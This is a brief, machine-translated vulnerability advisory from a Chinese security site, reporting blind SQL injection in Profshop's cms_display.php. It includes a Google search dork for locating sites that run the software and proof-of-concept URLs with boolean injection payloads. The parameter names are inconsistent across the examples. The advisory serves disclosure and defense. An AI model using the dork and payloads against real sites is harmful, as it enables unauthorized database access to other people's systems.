Profshop SQL injection vulnerability-vulnerability warning-the black bar safety net

2011-05-15T00:00:00
ID MYHACK58:62201130469
Type myhack58
Reporter 佚名
Modified 2011-05-15T00:00:00

Description

Vulnerability description: Profshop (cms_display.php)since the filter is not strict, resulting in sql blind injection vulnerability.

Vulnerability type: sql injection, ascript injection, blind injection, injection vulnerabilities

Vulnerability Publisher/date: Caddy-Dz/2011-05-14

Google keywords: intext:"powered by Profshop. co. uk"

Vulnerability test:

POC: the

http://www.xxx.net/cms_display.php?content_id=3+and+1=1-- [*] returns the correct

http://www.xxx.net/cms_display.php?id=3+and+1=2-- [*] returns an error

http://www.xxx.net/cms_display.php?id=[SQLI] [*] POC

Demo: the

http://www.xxx.net/cms_display.php?content_id=3+and+1=1--